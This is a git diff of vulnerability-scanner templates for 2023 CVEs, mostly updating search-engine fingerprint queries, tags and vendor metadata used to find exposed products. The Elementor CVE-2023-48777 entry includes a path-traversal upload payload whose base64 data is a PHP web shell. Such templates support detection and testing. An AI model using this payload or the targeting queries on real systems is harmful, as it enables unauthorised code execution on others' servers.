shodan-query: + - title:TeamCity + - http.title:teamcity + - http.component:"teamcity" + fofa-query: + - title=TeamCity + - title=teamcity google-query: intitle:teamcity tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index fca1c6ab1c..e47ec1dfe8 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -20,11 +20,14 @@ info: epss-percentile: 0.99539 cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: nextgen - product: mirth_connect - shodan-query: title:"mirth connect administrator" - fofa-query: title="mirth connect administrator" - google-query: intitle:"mirth connect administrator" + product: "mirth_connect" + shodan-query: + - "title:\"mirth connect administrator\"" + - http.title:"mirth connect administrator" + fofa-query: "title=\"mirth connect administrator\"" + google-query: "intitle:\"mirth connect administrator\"" tags: packetstorm,cve,cve2023,nextgen,rce,kev http: diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 0156015bfa..b7db700045 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -25,10 +25,16 @@ info: max-request: 2 vendor: digitaldruid product: hoteldruid - shodan-query: title:"HotelDruid" - fofa-query: title="HotelDruid" + shodan-query: + - title:"HotelDruid" + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="HotelDruid" + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve,cve2023,hoteldruid,cms,sqli + tags: cve,cve2023,hoteldruid,cms,sqli,digitaldruid flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 1b03319341..68cd272de0 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -24,8 +24,13 @@ info: max-request: 2 vendor: osgeo product: geoserver - shodan-query: title:"GeoServer" - fofa-query: app="GeoServer" + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="GeoServer" + - app="geoserver" + - title="geoserver" google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo variables: diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 1a4909be15..fb1041ffa7 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -22,8 +22,14 @@ info: max-request: 8 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe Coldfusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe Coldfusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,coldfusion,adobe,xss variables: diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index aa04c22912..cf0a5659ad 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -27,8 +27,14 @@ info: max-request: 4 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,deserialization,xss variables: diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index c73b212557..08a4e56944 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -25,8 +25,13 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: html:"Cockpit" - fofa-query: icon_hash=688609340 + shodan-query: + - html:"Cockpit" + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve2023,cve,huntr,cockpit,xss,agentejo http: diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 2ab6310d5b..65f2741e71 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -23,10 +23,11 @@ info: epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: moosocial product: moosocial - shodan-query: http.favicon.hash:"702863115" - fofa-query: icon_hash="702863115" + shodan-query: "http.favicon.hash:\"702863115\"" + fofa-query: "icon_hash=\"702863115\"" tags: cve2023,cve,moosocial,xss flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 9d0c9e2e8c..c299f6dfbc 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: moosocial product: moosocial - shodan-query: http.favicon.hash:702863115 + shodan-query: + - http.favicon.hash:702863115 + - http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" tags: cve,cve2023,moosocial,xss diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index 36eba8883d..0259a8e718 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -19,12 +19,13 @@ info: epss-percentile: 0.90979 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: + max-request: 2 vendor: mooveagency - product: import_xml_and_rss_feeds + product: "import_xml_and_rss_feeds" framework: wordpress - shodan-query: http.html:"import-xml-feed" - fofa-query: body="import-xml-feed" - tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce + shodan-query: "http.html:\"import-xml-feed\"" + fofa-query: "body=\"import-xml-feed\"" + tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 984446aece..b592c84662 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -18,12 +18,12 @@ info: cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: 01generator product: pireospay framework: prestashop - shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,pireospay + shodan-query: "http.component:\"prestashop\"" + tags: cve,cve2023,sqli,prestashop,pireospay,01generator flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 2e270317c4..19da7ce5f3 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: dlink product: dar-8000-10_firmware - fofa-query: body="DAR-8000-10" && title="D-Link" + fofa-query: + - body="DAR-8000-10" && title="D-Link" + - body="dar-8000-10" && title="d-link" tags: cve,cve2023,dlink http: diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index f70d7f4030..289211b0d2 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: frigate product: frigate - shodan-query: title:"Frigate" + shodan-query: + - title:"Frigate" + - http.title:"frigate" fofa-query: title="frigate" google-query: intitle:"frigate" tags: cve,cve2023,frigate,xss diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index b214413bbb..16b774543a 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -24,8 +24,14 @@ info: max-request: 1 vendor: papercut product: papercut_ng - shodan-query: html:"content=\"PaperCut\"" - fofa-query: body='content="papercut' + shodan-query: + - html:"content=\"PaperCut\"" + - http.html:'content="papercut' + - cpe:"cpe:2.3:a:papercut:papercut_ng" + - http.html:"content=\"papercut\"" + fofa-query: + - body='content="papercut' + - body="content=\"papercut\"" google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 2296049141..72c2cbc036 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: viessmann product: vitogate_300_firmware - shodan-query: title:"Vitogate 300" - fofa-query: title="Vitogate 300" + shodan-query: + - title:"Vitogate 300" + - http.title:"vitogate 300" + fofa-query: + - title="Vitogate 300" + - title="vitogate 300" google-query: intitle:"vitogate 300" tags: cve2023,cve,rce,vitogate,viessmann diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 1c08d1ff93..df95bf56ee 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -23,10 +23,11 @@ info: epss-percentile: 0.70433 cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: qdpm product: qdpm - shodan-query: http.favicon.hash:762074255 - fofa-query: icon_hash=762074255 + shodan-query: "http.favicon.hash:762074255" + fofa-query: "icon_hash=762074255" tags: cve,cve2023,qdpm,lfi http: diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index e9b2f188d1..3f369abe5d 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -28,7 +28,9 @@ info: framework: wordpress shodan-query: http.html:/wp-content/plugins/forminator fofa-query: body=/wp-content/plugins/forminator - publicwww-query: /wp-content/plugins/Forminator + publicwww-query: + - /wp-content/plugins/Forminator + - /wp-content/plugins/forminator tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub variables: string: "CVE-2023-4596" diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index fd414b8270..e41de71bb2 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -24,7 +24,7 @@ info: product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,ndk_steppingpack + tags: cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign http: - raw: diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 24d84a38c4..0dbd4df84c 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -27,7 +27,7 @@ info: vendor: hardy-barth product: cph2_echarge shodan-query: html:"Salia PLCC" - tags: cve2023,cve,salia-plcc,cph2,rce + tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth http: - method: GET diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 60047d0dd1..ed38f64241 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: totolink product: a3700r_firmware - shodan-query: title:"Totolink" + shodan-query: + - title:"Totolink" + - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve,cve2023,totolink,router,iot,rce diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 7242a7edba..225185b574 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -25,7 +25,9 @@ info: max-request: 7 vendor: f5 product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 5887f56639..efacf2bd89 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -22,10 +22,12 @@ info: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer - shodan-query: "http.title:\"OpManager Plus\"" + shodan-query: + - "http.title:\"OpManager Plus\"" + - http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" - tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive + tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp http: - raw: diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index b83f741a43..d64828fbc8 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: sysaid product: sysaid_on-premises - shodan-query: http.favicon.hash:1540720428 + shodan-query: + - http.favicon.hash:1540720428 + - http.favicon.hash:"1540720428" fofa-query: icon_hash="1540720428" tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive variables: diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index aacf536e8b..262d96bf24 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -27,10 +27,12 @@ info: max-request: 2 vendor: salesagility product: suitecrm - shodan-query: title:"SuiteCRM" + shodan-query: + - title:"SuiteCRM" + - http.title:"suitecrm" fofa-query: title="suitecrm" google-query: intitle:"suitecrm" - tags: cve,cve2023,graphql,suitecrm,introspection + tags: cve,cve2023,graphql,suitecrm,introspection,salesagility http: - raw: diff --git a/http/cves/2023/CVE-2023-48023.yaml b/http/cves/2023/CVE-2023-48023.yaml index dbb59e4a31..498ca34668 100644 --- a/http/cves/2023/CVE-2023-48023.yaml +++ b/http/cves/2023/CVE-2023-48023.yaml @@ -22,9 +22,15 @@ info: metadata: verified: true max-request: 1 - vendor: Anyscale - shodan-query: http.favicon.hash:463802404 - tags: cve,cve2023,ssrf,ray,anyscale + vendor: ray_project + shodan-query: + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + product: ray + fofa-query: + - icon_hash=463802404 + - body="ray dashboard" + tags: cve,cve2023,ssrf,ray,anyscale,Anyscale http: - method: GET diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 5736e9dbc0..c817761ce1 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -29,9 +29,12 @@ info: vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" - fofa-query: title="Nagios XI" + fofa-query: + - title="Nagios XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2023,nagiosxi,sqli,authenticated + tags: cve,cve2023,nagiosxi,sqli,authenticated,nagios http: - raw: diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 58d147569a..7b357f721e 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -9,13 +9,20 @@ info: remediation: Fixed in 3.18.2 reference: - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/ + - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2023-48777 + cwe-id: CWE-434 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true max-request: 4 framework: wordpress publicwww-query: "/wp-content/plugins/elementor/" tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated - variables: filename: "{{rand_base(6)}}" payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}' diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 2d706d3448..976ed2e726 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -25,8 +25,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index fc3671a7cf..a3bf5fea1d 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: owncloud product: graph_api - shodan-query: title:"owncloud" + shodan-query: + - title:"owncloud" + - http.title:"owncloud" fofa-query: title="owncloud" google-query: intitle:"owncloud" tags: cve2023,cve,owncloud,phpinfo,config,kev diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index b6f5c62688..0957853d15 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: citrix product: netscaler_application_delivery_controller - shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" + shodan-query: + - title:"Citrix Gateway" || title:"Netscaler Gateway" + - http.title:"citrix gateway" || title:"netscaler gateway" fofa-query: title="citrix gateway" || title:"netscaler gateway" google-query: intitle:"citrix gateway" || title:"netscaler gateway" tags: cve,cve2023,citrix,adc,info-leak,kev,exposure diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 40ebc73b1e..8b06122783 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -20,8 +20,12 @@ info: max-request: 1 vendor: creativeitem product: academy_lms - shodan-query: html:"Academy LMS" - fofa-query: body="Academy LMS" + shodan-query: + - html:"Academy LMS" + - http.html:"academy lms" + fofa-query: + - body="Academy LMS" + - body="academy lms" tags: packetstorm,cve2023,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index ffc9dbe95d..d0baf60453 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: creativeitem product: academy_lms - shodan-query: html:"Academy LMS" + shodan-query: + - html:"Academy LMS" + - http.html:"academy lms" fofa-query: body="academy lms" tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 1fc02e1c68..4a8ec14968 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -23,7 +23,7 @@ info: vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress - tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin + tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange http: - method: GET diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 839282aa43..fdc14dffa9 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -28,9 +28,17 @@ info: max-request: 1 vendor: apache product: solr - shodan-query: "title:\"Apache Solr\"" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - "title:\"Apache Solr\"" + - http.title:"apache solr" + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve,cve2023,apache,solr,exposure http: diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 63b4dbf8b0..b607a9fc06 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: dlink product: d-view_8 - shodan-query: http.favicon.hash:-1317621215 + shodan-query: + - http.favicon.hash:-1317621215 + - http.favicon.hash:"-1317621215" fofa-query: icon_hash="-1317621215" tags: cve2023,cve,d-link,auth-bypass,dlink diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index a17f063362..46ea75baeb 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/defender-security/ fofa-query: body=/wp-content/plugins/defender-security/ publicwww-query: "/wp-content/plugins/defender-security/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect + tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect,wpmudev http: - method: GET diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 3ff945baf1..7df5c46562 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -26,8 +26,11 @@ info: vendor: mjdm product: majordomo shodan-query: http.favicon.hash:1903390397 - fofa-query: app="MajordomoSL" - tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os + fofa-query: + - app="MajordomoSL" + - app="majordomosl" + - icon_hash=1903390397 + tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm http: - method: GET diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index 047939bafb..a0f7b0385d 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -25,8 +25,14 @@ info: max-request: 4 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2023,apache,ofbiz,ssrf variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index fcdac6e0b3..b414d79fa2 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -24,8 +24,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2023,cve,apache,ofbiz,rce http: diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 3f002294c4..6d7b5535c9 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -21,8 +21,12 @@ info: max-request: 4 vendor: wintercms product: winter - shodan-query: "title:\"Winter CMS\"" - fofa-query: "title=\"Winter CMS\"" + shodan-query: + - "title:\"Winter CMS\"" + - http.title:"winter cms" + fofa-query: + - "title=\"Winter CMS\"" + - title="winter cms" google-query: intitle:"winter cms" tags: cve,cve2023,authenticated,lfi,wintercms diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index ed253e3a45..a21c52c6f2 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2023,huntr,xss,microweber http: diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index ff1e8c9e4e..f27c76451d 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -27,10 +27,12 @@ info: max-request: 1 vendor: documentlocator product: document_locator - shodan-query: 'title:"Document Locator - WebTools"' + shodan-query: + - 'title:"Document Locator - WebTools"' + - http.title:"document locator - webtools" fofa-query: title="document locator - webtools" google-query: intitle:"document locator - webtools" - tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools + tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator http: - raw: diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 4d4d1b6635..1cb1794eef 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -23,9 +23,11 @@ info: max-request: 1 vendor: cloud product: citrix_storefront - shodan-query: html:"/Citrix/StoreWeb" + shodan-query: + - html:"/Citrix/StoreWeb" + - http.html:"/citrix/storeweb" fofa-query: body="/citrix/storeweb" - tags: cve,cve2024,xss,citrix,storefront + tags: cve,xss,citrix,storefront,cve2023,cloud http: - method: POST diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 56f289ea71..351995f731 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" - tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp + tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress http: - method: GET diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 817af599cd..fec49ff6dd 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -23,9 +23,11 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,oss,rce,intrusive + tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index 5fe2b87858..eb104322b9 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -22,8 +22,12 @@ info: max-request: 1 vendor: ray_project product: ray - shodan-query: http.favicon.hash:463802404 - fofa-query: body="ray dashboard" + shodan-query: + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + fofa-query: + - body="ray dashboard" + - icon_hash=463802404 tags: cve2023,cve,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index dbd612b0df..2faaf3f212 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -22,8 +22,13 @@ info: max-request: 2 vendor: ray_project product: ray - shodan-query: html:"Ray Dashboard" - fofa-query: body="ray dashboard" + shodan-query: + - html:"Ray Dashboard" + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + fofa-query: + - body="ray dashboard" + - icon_hash=463802404 tags: cve,cve2023,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index 25aacd650a..cc4f9e81c2 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -25,11 +25,17 @@ info: max-request: 1 vendor: vertaai product: modeldb - shodan-query: http.favicon.hash:-2097033750 - fofa-query: icon_hash=-2097033750 + shodan-query: + - http.favicon.hash:-2097033750 + - http.title:"verta ai" + fofa-query: + - icon_hash=-2097033750 + - title="verta ai" google-query: intitle:"verta ai" - zoomeye-query: title:"Verta AI" - tags: cve,cve2023,lfi,modeldb + zoomeye-query: + - title:"Verta AI" + - title:"verta ai" + tags: cve,cve2023,lfi,modeldb,vertaai http: - 